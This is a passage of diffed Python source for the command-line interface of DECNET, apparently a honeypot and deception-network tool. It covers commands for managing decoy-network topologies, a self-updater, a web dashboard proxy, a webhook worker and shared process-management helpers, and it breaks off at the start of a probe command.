|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.topology.config import TopologyConfig
|
||||
from decnet.topology.generator import generate
|
||||
from decnet.topology.persistence import hydrate, persist
|
||||
from decnet.topology.status import TopologyStatus
|
||||
|
||||
from .gating import _require_master_mode
|
||||
|
||||
# Console shared by every topology sub-command in this module.
_console = Console()

# The "topology" command group; the sub-commands register themselves on it
# through the @_group.command decorators.
_group = typer.Typer(
    no_args_is_help=True,
    help="MazeNET nested-topology commands (DECNET master only).",
    name="topology",
)
|
||||
|
||||
|
||||
async def _repo():
    """Return the repository from ``get_repository()`` after initialising it."""
    # Imported lazily, inside the coroutine, rather than at module import.
    from decnet.web.db.factory import get_repository

    repository = get_repository()
    await repository.initialize()
    return repository
|
||||
|
||||
|
||||
@_group.command("generate")
def _generate(
    name: str = typer.Option(..., "--name", help="Topology name"),
    depth: int = typer.Option(3, "--depth", min=1, max=16),
    branching: int = typer.Option(2, "--branching", min=1, max=8),
    deckies_per_lan: str = typer.Option(
        "1-3",
        "--deckies-per-lan",
        help="Min-max deckies per LAN, e.g. 1-3",
    ),
    bridge_forward_probability: float = typer.Option(1.0, "--bridge-forward-p", min=0.0, max=1.0),
    cross_edge_probability: float = typer.Option(0.0, "--cross-edge-p", min=0.0, max=1.0),
    services: Optional[str] = typer.Option(None, "--services", help="Comma-separated explicit services"),
    randomize_services: bool = typer.Option(True, "--randomize-services/--no-randomize-services"),
    seed: Optional[int] = typer.Option(None, "--seed", min=0),
) -> None:
    """Generate a topology plan and persist it as pending."""
    _require_master_mode("topology generate")

    # "MIN-MAX" -> two ints. A missing dash, an empty side or a non-number
    # all surface as ValueError (from unpacking or from int()).
    try:
        lo_text, hi_text = deckies_per_lan.split("-", 1)
        lo, hi = int(lo_text), int(hi_text)
    except ValueError as exc:
        _console.print("[red]--deckies-per-lan must be formatted as MIN-MAX, e.g. 1-3.[/]")
        raise typer.Exit(1) from exc

    services_explicit = (
        [s.strip() for s in services.split(",") if s.strip()] if services else None
    )

    try:
        cfg = TopologyConfig(
            name=name,
            depth=depth,
            branching_factor=branching,
            deckies_per_lan_min=lo,
            deckies_per_lan_max=hi,
            bridge_forward_probability=bridge_forward_probability,
            cross_edge_probability=cross_edge_probability,
            services_explicit=services_explicit,
            # An explicit service list overrides randomisation.
            randomize_services=randomize_services if not services_explicit else False,
            seed=seed,
        )
    except ValueError as e:
        # Show the config's own error text; chain it for debugging.
        _console.print(f"[red]{e}[/]")
        raise typer.Exit(1) from e

    plan = generate(cfg)

    async def _go() -> str:
        repo = await _repo()
        return await persist(repo, plan)

    tid = asyncio.run(_go())
    _console.print(f"[green]Topology persisted as pending[/] — id=[bold]{tid}[/]")
    _console.print(
        f" LANs: {len(plan.lans)} deckies: {len(plan.deckies)} edges: {len(plan.edges)}"
    )
|
||||
|
||||
|
||||
@_group.command("list")
def _list() -> None:
    """List all topologies."""
    _require_master_mode("topology list")

    async def _fetch() -> list[dict]:
        store = await _repo()
        return await store.list_topologies()

    topologies = asyncio.run(_fetch())
    if not topologies:
        _console.print("[yellow]No topologies.[/]")
        return

    # These four keys are read with [] (required); created_at is optional.
    required = ("id", "name", "mode", "status")
    table = Table(title="DECNET / MazeNET Topologies")
    for heading in (*required, "created_at"):
        table.add_column(heading)
    for topo in topologies:
        cells = [str(topo[field]) for field in required]
        cells.append(str(topo.get("created_at", "")))
        table.add_row(*cells)
    _console.print(table)
|
||||
|
||||
|
||||
@_group.command("show")
def _show(topology_id: str = typer.Argument(..., help="Topology id")) -> None:
    """Print a structured summary of a topology."""
    _require_master_mode("topology show")

    async def _go():
        repo = await _repo()
        return await hydrate(repo, topology_id)

    hydrated = asyncio.run(_go())
    if hydrated is None:
        _console.print(f"[red]No such topology: {topology_id}[/]")
        raise typer.Exit(1)

    topo = hydrated["topology"]
    _console.print(
        f"[bold]{topo['name']}[/] id={topo['id']} status={topo['status']}"
        f" mode={topo['mode']}"
    )

    def _decky_name(d: dict) -> str:
        # Prefer the name in the stored config, then the row's own name,
        # and fall back to the uuid.
        cfg = d.get("decky_config") or {}
        return cfg.get("name") or d.get("name") or d["uuid"]

    # Index deckies by uuid once instead of scanning the list for every edge.
    # setdefault keeps the first row if a uuid appears twice, which is what
    # a first-match scan would return.
    deckies_by_uuid: dict[str, dict] = {}
    for d in hydrated["deckies"]:
        decky_uuid = d.get("uuid")
        if decky_uuid is not None:
            deckies_by_uuid.setdefault(decky_uuid, d)

    edges_by_lan: dict[str, list[dict]] = {}
    for e in hydrated["edges"]:
        edges_by_lan.setdefault(e["lan_id"], []).append(e)

    for lan in hydrated["lans"]:
        dmz_tag = " [dim](DMZ)[/]" if lan["is_dmz"] else ""
        _console.print(f"\n[cyan]LAN[/] {lan['name']} {lan['subnet']}{dmz_tag}")
        for e in edges_by_lan.get(lan["id"], []):
            decky = deckies_by_uuid.get(e["decky_uuid"])
            if decky is None:
                # The edge points at a decky that was not hydrated; skip it.
                continue
            cfg = decky.get("decky_config") or {}
            name = _decky_name(decky)
            # Per-LAN address from the config, keyed by LAN name; fall back
            # to the decky row's "ip", then "?".
            ip = (cfg.get("ips_by_lan") or {}).get(lan["name"]) or decky.get("ip") or "?"
            tags = []
            if e["is_bridge"]:
                tags.append("bridge")
            if e["forwards_l3"]:
                tags.append("L3-forward")
            tag_s = f" [yellow]({', '.join(tags)})[/]" if tags else ""
            svcs = ",".join(cfg.get("services") or decky.get("services") or []) or "-"
            _console.print(f" • {name} {ip} svcs={svcs}{tag_s}")
|
||||
|
||||
|
||||
@_group.command("deploy")
def _deploy(
    topology_id: str = typer.Argument(..., help="Topology id (must be pending)"),
    dry_run: bool = typer.Option(False, "--dry-run", help="Write compose + create nets, skip containers"),
) -> None:
    """Deploy a pending topology."""
    _require_master_mode("topology deploy")
    # Imported lazily, after the master-mode gate has passed.
    from decnet.engine.deployer import deploy_topology

    async def _run_deploy() -> None:
        # Obtain the repository, then hand the topology to the deployer.
        await deploy_topology(await _repo(), topology_id, dry_run=dry_run)

    asyncio.run(_run_deploy())
    _console.print(f"[green]Topology {topology_id} deployed.[/]")
|
||||
|
||||
|
||||
@_group.command("teardown")
def _teardown(
    topology_id: str = typer.Argument(..., help="Topology id"),
) -> None:
    """Tear down a topology. Legal from active|degraded|failed|deploying."""
    _require_master_mode("topology teardown")
    # Imported lazily, after the master-mode gate has passed.
    from decnet.engine.deployer import teardown_topology

    async def _run_teardown() -> None:
        # Obtain the repository, then hand the topology to the deployer.
        await teardown_topology(await _repo(), topology_id)

    asyncio.run(_run_teardown())
    _console.print(f"[green]Topology {topology_id} torn down.[/]")
|
||||
|
||||
|
||||
@_group.command("delete")
def _delete(
    topology_id: str = typer.Argument(..., help="Topology id"),
    force: bool = typer.Option(
        False,
        "--force",
        help="Skip the confirmation prompt (required for non-interactive use).",
    ),
) -> None:
    """Delete a topology and all its children (LANs, deckies, edges, mutations).

    Refuses while containers are running — teardown first.
    """
    _require_master_mode("topology delete")

    # Statuses in which the command refuses to delete.
    blocking_statuses = {
        TopologyStatus.DEPLOYING,
        TopologyStatus.ACTIVE,
        TopologyStatus.DEGRADED,
        TopologyStatus.TEARING_DOWN,
    }

    async def _attempt_delete() -> tuple[bool, Optional[str]]:
        # Returns (deleted, reason): reason is "not-found", the blocking
        # status rendered as text, or None when the cascade delete ran.
        repo = await _repo()
        record = await repo.get_topology(topology_id)
        if record is None:
            return False, "not-found"
        current = record["status"]
        if current in blocking_statuses:
            return False, str(current)
        return await repo.delete_topology_cascade(topology_id), None

    if not force:
        confirmed = typer.confirm(
            f"Delete topology {topology_id} and all its children? This cannot be undone.",
            default=False,
        )
        if not confirmed:
            _console.print("[yellow]Cancelled.[/]")
            raise typer.Exit(0)

    ok, reason = asyncio.run(_attempt_delete())

    if reason == "not-found":
        _console.print(f"[red]No such topology: {topology_id}[/]")
        raise typer.Exit(1)
    if reason is not None:
        _console.print(
            f"[red]Cannot delete while status={reason!r}. Run "
            f"[bold]decnet topology teardown {topology_id}[/] first.[/]"
        )
        raise typer.Exit(1)
    if not ok:
        _console.print(f"[red]Delete failed: {topology_id}[/]")
        raise typer.Exit(1)

    _console.print(f"[green]Topology {topology_id} deleted.[/]")
|
||||
|
||||
|
||||
@_group.command("mutate")
def _mutate(
    topology_id: str = typer.Argument(..., help="Topology id (active or degraded)"),
    op: str = typer.Argument(
        ...,
        help=(
            "One of: add_lan, remove_lan, add_decky, attach_decky, "
            "detach_decky, remove_decky, update_decky, update_lan"
        ),
    ),
    payload_json: str = typer.Option(
        "{}",
        "--payload-json",
        help="JSON payload for the op (see mutator.ops for keys)",
    ),
    expected_version: Optional[int] = typer.Option(
        None,
        "--expected-version",
        help="Optimistic-concurrency guard; enqueue fails with a "
        "VersionConflict if the topology has since been mutated.",
    ),
) -> None:
    """Enqueue a live mutation. The mutator's watch loop applies it."""
    _require_master_mode("topology mutate")
    import json

    try:
        payload = json.loads(payload_json)
    except ValueError as e:
        _console.print(f"[red]Invalid JSON: {e}[/]")
        # The parse error was already reported; don't chain it onto the exit.
        raise typer.Exit(1) from None

    # json.loads also accepts arrays, strings, numbers and null.  The payload
    # is documented as a set of keys, so reject anything that is not an
    # object here instead of enqueueing a mutation that cannot be applied.
    if not isinstance(payload, dict):
        _console.print(
            f"[red]Invalid payload: expected a JSON object, got {type(payload).__name__}[/]"
        )
        raise typer.Exit(1)

    async def _go() -> str:
        repo = await _repo()
        return await repo.enqueue_topology_mutation(
            topology_id, op, payload, expected_version=expected_version,
        )

    mid = asyncio.run(_go())
    _console.print(
        f"[green]Mutation enqueued[/] — id=[bold]{mid}[/] op={op} "
        f"(watch for state=applied on [cyan]topology mutations {topology_id}[/])"
    )
|
||||
|
||||
|
||||
@_group.command("mutations")
def _mutations(
    topology_id: str = typer.Argument(..., help="Topology id"),
    state: Optional[str] = typer.Option(
        None,
        "--state",
        help="Filter to one of pending|applying|applied|failed",
    ),
) -> None:
    """List queued/applied mutations for a topology."""
    _require_master_mode("topology mutations")

    async def _fetch() -> list[dict]:
        return await (await _repo()).list_topology_mutations(topology_id, state=state)

    rows = asyncio.run(_fetch())
    if not rows:
        _console.print("[yellow]No mutations.[/]")
        return

    table = Table(title=f"Mutations — topology {topology_id}")
    for heading in ("id", "op", "state", "requested_at", "applied_at", "reason"):
        table.add_column(heading)

    for entry in rows:
        # id / op / state are read as required keys; the rest are optional.
        cells = [str(entry[key]) for key in ("id", "op", "state")]
        cells.append(str(entry.get("requested_at", "")))
        cells.extend(str(entry.get(key) or "") for key in ("applied_at", "reason"))
        table.add_row(*cells)

    _console.print(table)
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Mount the topology command group on *app* under the name ``topology``."""
    app.add_typer(_group, name="topology")


# Names exported by a star-import of this module.
__all__ = ["register", "TopologyStatus"]
|
||||
@@ -1,46 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import pathlib as _pathlib
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``updater`` command to *app*."""

    @app.command()
    def updater(
        port: int = typer.Option(8766, "--port", help="Port for the self-updater daemon"),
        host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the updater"),  # nosec B104
        updater_dir: Optional[str] = typer.Option(None, "--updater-dir", help="Updater cert bundle dir (default: ~/.decnet/updater)"),
        install_dir: Optional[str] = typer.Option(None, "--install-dir", help="Release install root (default: /opt/decnet)"),
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker agent cert bundle (for local /health probes; default: ~/.decnet/agent)"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the DECNET self-updater (requires a bundle in ~/.decnet/updater/)."""
        from decnet.swarm import pki as _pki
        from decnet.updater import server as _upd_server

        # An explicit CLI value wins; otherwise fall back to the defaults.
        if updater_dir:
            resolved_updater = _pathlib.Path(updater_dir)
        else:
            resolved_updater = _upd_server.DEFAULT_UPDATER_DIR

        if install_dir:
            resolved_install = _pathlib.Path(install_dir)
        else:
            resolved_install = _pathlib.Path("/opt/decnet")

        if agent_dir:
            resolved_agent = _pathlib.Path(agent_dir)
        else:
            resolved_agent = _pki.DEFAULT_AGENT_DIR

        if daemon:
            log.info("updater daemonizing host=%s port=%d", host, port)
            _utils._daemonize()

        log.info(
            "updater command invoked host=%s port=%d updater_dir=%s install_dir=%s",
            host, port, resolved_updater, resolved_install,
        )
        console.print(f"[green]Starting DECNET self-updater on {host}:{port} (mTLS)...[/]")

        exit_code = _upd_server.run(
            host, port,
            updater_dir=resolved_updater,
            install_dir=resolved_install,
            agent_dir=resolved_agent,
        )
        # A non-zero server result becomes the process exit status.
        if exit_code != 0:
            raise typer.Exit(exit_code)
|
||||
@@ -1,217 +0,0 @@
|
||||
"""Shared CLI helpers: console, logger, process management, swarm HTTP client.
|
||||
|
||||
Submodules reference these as ``from . import utils`` then ``utils.foo(...)``
|
||||
so tests can patch ``decnet.cli.utils.<name>`` and have every caller see it.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.console import Console
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
|
||||
|
||||
log = get_logger("cli")
|
||||
console = Console()
|
||||
|
||||
|
||||
def _daemonize() -> None:
    """Fork the current process into a background daemon (Unix double-fork).

    The first fork returns control to the launching shell, ``setsid`` starts
    a new session, and the second fork leaves the surviving process as a
    non-session-leader.  Each parent exits through ``SystemExit(0)``; only
    the final child returns from this function.

    In the child, file descriptors 0-2 are redirected to ``os.devnull`` and
    the ``sys.std*`` objects are rebound to fresh devnull handles.
    """
    # Flush before forking: anything still buffered would otherwise be
    # duplicated into the child along with the rest of the process image.
    for stream in (sys.stdout, sys.stderr):
        try:
            stream.flush()
        except (AttributeError, OSError, ValueError):
            pass  # stream is None or already closed — nothing to flush

    if os.fork() > 0:
        raise SystemExit(0)
    os.setsid()
    if os.fork() > 0:
        raise SystemExit(0)

    # Redirect the OS-level descriptors too.  Rebinding sys.stdout alone
    # leaves fd 0-2 attached to the launching terminal, so anything that
    # captured the original stream objects (or writes to the raw fds) would
    # keep hitting the tty and fail once it goes away.
    null_fd = os.open(os.devnull, os.O_RDWR)
    try:
        for std_fd in (0, 1, 2):
            os.dup2(null_fd, std_fd)
    finally:
        # Only close the scratch descriptor if it is not itself a std fd.
        if null_fd > 2:
            os.close(null_fd)

    sys.stdout = open(os.devnull, "w")  # noqa: SIM115
    sys.stderr = open(os.devnull, "w")  # noqa: SIM115
    sys.stdin = open(os.devnull, "r")  # noqa: SIM115
|
||||
|
||||
|
||||
def _pid_dir() -> Path:
    """Return a writable directory for PID files.

    Candidates are tried in order: ``/opt/decnet`` (production), then
    ``~/.decnet`` (dev).  Each candidate is created if it is missing, and
    the first one that is writable is returned.  When neither can be
    created or written to, ``/tmp`` is returned as a last resort.
    """
    candidates = [Path("/opt/decnet"), Path.home() / ".decnet"]
    for path in candidates:
        try:
            path.mkdir(parents=True, exist_ok=True)
        except OSError:
            # Covers PermissionError as well (it is an OSError subclass).
            continue
        if os.access(path, os.W_OK):
            return path
    return Path("/tmp")  # nosec B108
|
||||
|
||||
|
||||
def _spawn_detached(argv: list[str], pid_file: Path) -> int:
    """Spawn a DECNET subcommand as a fully-independent sibling process.

    The parent does NOT wait() on this child. start_new_session=True puts
    the child in its own session so SIGHUP on parent exit doesn't kill it;
    stdin/stdout/stderr go to /dev/null so the launching shell can close
    without EIO on the child. close_fds=True prevents inherited sockets
    from pinning ports we're trying to rebind.

    This is deliberately NOT a supervisor — we fire-and-forget. If the
    child dies, the operator restarts it manually via its own subcommand.

    Args:
        argv: Full command line of the process to launch.
        pid_file: Where the child's PID is recorded.  If it already names a
            PID that can be signalled, nothing is spawned.

    Returns:
        The PID already recorded in *pid_file* when that process can be
        signalled, otherwise the PID of the newly spawned child.
    """
    if pid_file.exists():
        try:
            existing = int(pid_file.read_text().strip())
            os.kill(existing, 0)  # signal 0: existence probe, sends nothing
            return existing
        except (ValueError, OSError):
            # Unparseable contents or a PID we cannot signal (OSError covers
            # ProcessLookupError and PermissionError) — treat the file as
            # stale, fall through and spawn.
            pass

    # Make sure the PID file location exists BEFORE launching: failing here
    # afterwards would leave a running child that nothing keeps track of.
    pid_file.parent.mkdir(parents=True, exist_ok=True)

    with open(os.devnull, "rb") as dn_in, open(os.devnull, "ab") as dn_out:
        proc = subprocess.Popen(  # nosec B603
            argv,
            stdin=dn_in, stdout=dn_out, stderr=dn_out,
            start_new_session=True, close_fds=True,
        )
    pid_file.write_text(f"{proc.pid}\n")
    return proc.pid
|
||||
|
||||
|
||||
def _is_running(match_fn) -> int | None:
    """Return PID of a running DECNET process matching ``match_fn(cmdline)``, or None."""
    import psutil

    for candidate in psutil.process_iter(["pid", "cmdline"]):
        try:
            argv = candidate.info["cmdline"]
            # Processes with no recorded command line are never offered to
            # the matcher.
            matched = bool(argv) and match_fn(argv)
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue
        if matched:
            return candidate.info["pid"]
    return None
|
||||
|
||||
|
||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
    """Return the microservice registry for health-check and relaunch.

    On agents these run as systemd units invoking /usr/local/bin/decnet,
    which doesn't include "decnet.cli" in its cmdline. On master dev boxes
    they're launched via `python -m decnet.cli`. Match either form — cmd
    is a list of argv tokens, so substring-check the joined string.

    Each entry is ``(display_name, matcher, launch_argv)``: *matcher* takes
    a process command line (argv list or plain string) and returns a bool,
    and *launch_argv* is the command used to relaunch the service.
    """
    # NOTE(review): ``callable`` in the return annotation is the builtin
    # predicate, not a type; ``Callable[[list[str]], bool]`` would need a
    # typing import at file level.
    _py = sys.executable

    def _matches(sub: str, extras: tuple[str, ...] = ()):
        # Build a matcher requiring "decnet", *sub* and every one of
        # *extras* to appear somewhere in the joined command line.
        def _check(cmd) -> bool:
            joined = " ".join(cmd) if not isinstance(cmd, str) else cmd
            if "decnet" not in joined or sub not in joined:
                return False
            return all(e in joined for e in extras)
        return _check

    return [
        ("Collector", _matches("collect"),
         [_py, "-m", "decnet.cli", "collect", "--daemon", "--log-file", log_file]),
        ("Mutator", _matches("mutate", ("--watch",)),
         [_py, "-m", "decnet.cli", "mutate", "--daemon", "--watch"]),
        ("Prober", _matches("probe"),
         [_py, "-m", "decnet.cli", "probe", "--daemon", "--log-file", log_file]),
        ("Profiler", _matches("profiler"),
         [_py, "-m", "decnet.cli", "profiler", "--daemon"]),
        ("Sniffer", _matches("sniffer"),
         [_py, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", log_file]),
        # Same joined-substring rule as every other entry, so a launch via a
        # full path such as /usr/bin/uvicorn is recognised as well (exact
        # token membership would miss it).
        ("API", _matches("uvicorn", ("decnet.web.api:app",)),
         [_py, "-m", "uvicorn", "decnet.web.api:app",
          "--host", DECNET_API_HOST, "--port", str(DECNET_API_PORT)]),
    ]
|
||||
|
||||
|
||||
def _systemd_units(pattern: str = "decnet-*.service") -> list[dict] | None:
|
||||
"""Return state of every systemd unit matching *pattern*, or ``None``
|
||||
when systemctl is unavailable (non-systemd host, container lab,
|
||||
PATH-stripped env, user-manager unreachable).
|
||||
|
||||
Output shape mirrors ``systemctl list-units --output=json``: each
|
||||
dict has ``unit``, ``load``, ``active``, ``sub``, ``description``.
|
||||
Empty list = systemd works but no matching units are loaded (fresh
|
||||
host that never ran ``decnet init``).
|
||||
"""
|
||||
import json # local import — avoids paying it on every CLI startup
|
||||
import shutil
|
||||
|
||||
if not shutil.which("systemctl"):
|
||||
return None
|
||||
try:
|
||||
proc = subprocess.run( # nosec B603 B607 — fixed argv, no shell
|
||||
[
|
||||
"systemctl", "list-units",
|
||||
"--type=service", "--all",
|
||||
"--no-legend", "--no-pager",
|
||||
"--output=json",
|
||||
pattern,
|
||||
],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5,
|
||||
check=False,
|
||||
)
|
||||
except (OSError, subprocess.SubprocessError):
|
||||
return None
|
||||
if proc.returncode != 0:
|
||||
return None
|
||||
try:
|
||||
data = json.loads(proc.stdout or "[]")
|
||||
except json.JSONDecodeError:
|
||||
return None
|
||||
return data if isinstance(data, list) else None
|
||||
|
||||
|
||||
def _kill_all_services() -> None:
    """Find and kill all running DECNET microservice processes.

    Every entry of the service registry is probed once; a matching process
    is sent SIGTERM.  A process that disappears before the signal lands, or
    that we are not allowed to signal, no longer aborts the sweep — the
    remaining services are still processed.
    """
    registry = _service_registry(str(DECNET_INGEST_LOG_FILE))
    killed = 0
    for name, match_fn, _launch_args in registry:
        pid = _is_running(match_fn)
        if pid is None:
            continue
        console.print(f"[yellow]Stopping {name} (PID {pid})...[/]")
        try:
            os.kill(pid, signal.SIGTERM)
        except ProcessLookupError:
            # Exited between detection and the signal — nothing left to stop.
            continue
        except PermissionError:
            console.print(f"[red]Cannot stop {name} (PID {pid}): permission denied.[/]")
            continue
        killed += 1

    if killed:
        console.print(f"[green]{killed} background process(es) stopped.[/]")
    else:
        console.print("[dim]No DECNET services were running.[/]")
|
||||
|
||||
|
||||
# Used when neither an explicit URL nor DECNET_SWARMCTL_URL is provided.
_DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"


def _swarmctl_base_url(url: Optional[str]) -> str:
    """Resolve the swarm controller base URL.

    Precedence: the explicit *url* argument, then the ``DECNET_SWARMCTL_URL``
    environment variable, then ``_DEFAULT_SWARMCTL_URL``.  An empty value at
    any level counts as "not provided", so an exported-but-blank environment
    variable falls through to the default instead of yielding ``""``.
    """
    return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
|
||||
|
||||
|
||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
    """Tiny sync wrapper around httpx; avoids leaking async into the CLI."""
    import httpx

    # Transport-level failure: report it and exit with status 2.
    try:
        resp = httpx.request(method, url, json=json_body, timeout=timeout)
    except httpx.HTTPError as exc:
        console.print(f"[red]Could not reach swarm controller at {url}: {exc}[/]")
        console.print("[dim]Is `decnet swarmctl` running?[/]")
        raise typer.Exit(2)

    if resp.status_code < 400:
        return resp

    # Error response: prefer the JSON "detail" field and fall back to the
    # raw body whenever it cannot be extracted.
    try:
        detail = resp.json().get("detail", resp.text)
    except Exception:  # nosec B110
        detail = resp.text
    console.print(f"[red]{method} {url} failed: {resp.status_code} — {detail}[/]")
    raise typer.Exit(1)
|
||||
@@ -1,153 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_WEB_HOST, DECNET_WEB_PORT
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _proxy_target(api_host: str) -> str:
    """Resolve the host the web proxy should connect to.

    The API binds at ``DECNET_API_HOST``; when that's a wildcard
    (``0.0.0.0`` / ``::``) we still connect over loopback because the
    web and API run in the same host. When the operator binds the API
    to a specific address (e.g. a Tailscale IP), the API is *only*
    reachable there — loopback is closed — so the proxy must follow.

    Any spelling of the unspecified address is treated as a wildcard
    (e.g. ``0:0:0:0:0:0:0:0``), as is the empty string.  Hostnames and
    concrete addresses are returned unchanged.
    """
    import ipaddress

    if api_host == "":
        return "127.0.0.1"
    try:
        is_wildcard = ipaddress.ip_address(api_host).is_unspecified
    except ValueError:
        # Not an IP literal (a hostname, for instance) — use it as given.
        is_wildcard = False
    return "127.0.0.1" if is_wildcard else api_host
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``web`` command (static dashboard + /api reverse proxy) to *app*."""

    @app.command(name="web")
    def serve_web(
        web_port: int = typer.Option(DECNET_WEB_PORT, "--web-port", help="Port to serve the DECNET Web Dashboard"),
        host: str = typer.Option(DECNET_WEB_HOST, "--host", help="Host IP to serve the Web Dashboard"),
        api_host: str = typer.Option(DECNET_API_HOST, "--api-host", help="Host the DECNET API is listening on (loopback for wildcard binds)"),
        api_port: int = typer.Option(DECNET_API_PORT, "--api-port", help="Port the DECNET API is listening on"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Serve the DECNET Web Dashboard frontend.

        Proxies /api/* requests to the API server so the frontend can use
        relative URLs (/api/v1/...) with no CORS configuration required.
        """
        import http.client
        import http.server
        import os
        import socketserver
        from pathlib import Path

        dist_dir = Path(__file__).resolve().parent.parent.parent / "decnet_web" / "dist"

        if not dist_dir.exists():
            console.print(f"[red]Frontend build not found at {dist_dir}. Make sure you run 'npm run build' inside 'decnet_web'.[/]")
            raise typer.Exit(1)

        _api_target = _proxy_target(api_host)

        if daemon:
            log.info(
                "web daemonizing host=%s port=%d api_target=%s:%d",
                host, web_port, _api_target, api_port,
            )
            _utils._daemonize()

        _api_port = api_port

        class SPAHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
            """Static file handler with SPA fallback and an /api/* reverse proxy."""

            def do_GET(self):
                if self.path.startswith("/api/"):
                    self._proxy("GET")
                    return
                # SPA fallback: unknown paths and directories get index.html
                # so client-side routing can take over.
                path = self.translate_path(self.path)
                if not Path(path).exists() or Path(path).is_dir():
                    self.path = "/index.html"
                return super().do_GET()

            def _proxy_or_405(self, method: str) -> None:
                # Non-GET verbs are only meaningful for the API; anything
                # else is answered with 405.
                if self.path.startswith("/api/"):
                    self._proxy(method)
                    return
                self.send_error(405)

            def do_POST(self):
                self._proxy_or_405("POST")

            def do_PUT(self):
                self._proxy_or_405("PUT")

            def do_DELETE(self):
                self._proxy_or_405("DELETE")

            def do_PATCH(self):
                self._proxy_or_405("PATCH")

            def do_OPTIONS(self):
                self._proxy_or_405("OPTIONS")

            def _proxy(self, method: str) -> None:
                # Validate Content-Length first: a non-numeric value used to
                # raise out of the handler, and a negative one would make
                # rfile.read() block until the client closes the socket.
                try:
                    content_length = int(self.headers.get("Content-Length", 0))
                except ValueError:
                    self.send_error(400, "Invalid Content-Length header")
                    return
                if content_length < 0:
                    self.send_error(400, "Invalid Content-Length header")
                    return
                body = self.rfile.read(content_length) if content_length else None

                forward = {k: v for k, v in self.headers.items()
                           if k.lower() not in ("host", "connection")}

                conn = None
                headers_sent = False
                try:
                    conn = http.client.HTTPConnection(_api_target, _api_port, timeout=120)
                    conn.request(method, self.path, body=body, headers=forward)
                    resp = conn.getresponse()

                    self.send_response(resp.status)
                    for key, val in resp.getheaders():
                        if key.lower() not in ("connection", "transfer-encoding"):
                            self.send_header(key, val)
                    self.end_headers()
                    headers_sent = True

                    # Event streams are long-lived: lift the socket timeout
                    # so an idle stream is not cut after 120 s.
                    content_type = resp.getheader("Content-Type", "")
                    if "text/event-stream" in content_type:
                        conn.sock.settimeout(None)

                    # read1 hands data over as it arrives instead of waiting
                    # for a full 4096-byte buffer.
                    _read = getattr(resp, "read1", resp.read)
                    while True:
                        chunk = _read(4096)
                        if not chunk:
                            break
                        self.wfile.write(chunk)
                        self.wfile.flush()
                except Exception as exc:
                    log.warning("web proxy error %s %s: %s", method, self.path, exc)
                    # Once the upstream status line and headers are out, a
                    # second response would only corrupt the body stream.
                    if not headers_sent:
                        self.send_error(502, f"API proxy error: {exc}")
                finally:
                    if conn is not None:
                        try:
                            conn.close()
                        except Exception:  # nosec B110 — best-effort conn cleanup
                            pass

            def log_message(self, fmt: str, *args: object) -> None:
                # Route access logs through the CLI logger.
                log.debug("web %s", fmt % args)

        # The handler serves files relative to the current working directory.
        os.chdir(dist_dir)

        socketserver.TCPServer.allow_reuse_address = True
        with socketserver.ThreadingTCPServer((host, web_port), SPAHTTPRequestHandler) as httpd:
            console.print(f"[green]Serving DECNET Web Dashboard on http://{host}:{web_port}[/]")
            console.print(f"[dim]Proxying /api/* → http://{_api_target}:{_api_port}[/]")
            try:
                httpd.serve_forever()
            except KeyboardInterrupt:
                console.print("\n[dim]Shutting down dashboard server.[/]")
|
||||
@@ -1,35 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    """Attach the ``webhook`` command to *app*."""

    @app.command(name="webhook")
    def webhook_cmd(
        daemon: bool = typer.Option(
            False, "--daemon", "-d", help="Detach to background as a daemon process"
        ),
    ) -> None:
        """Run the webhook dispatcher — bus consumer → external HTTP egress."""
        import asyncio
        from decnet.web.dependencies import repo
        from decnet.webhook import webhook_worker

        if daemon:
            log.info("webhook daemonizing")
            _utils._daemonize()

        log.info("webhook starting")
        console.print("[bold cyan]Webhook dispatcher starting[/]")

        async def _dispatch() -> None:
            # The repository is initialised before the worker is started.
            await repo.initialize()
            await webhook_worker(repo)

        try:
            asyncio.run(_dispatch())
        except KeyboardInterrupt:
            console.print("\n[yellow]Webhook worker stopped.[/]")
|
||||
@@ -1,297 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
def probe(
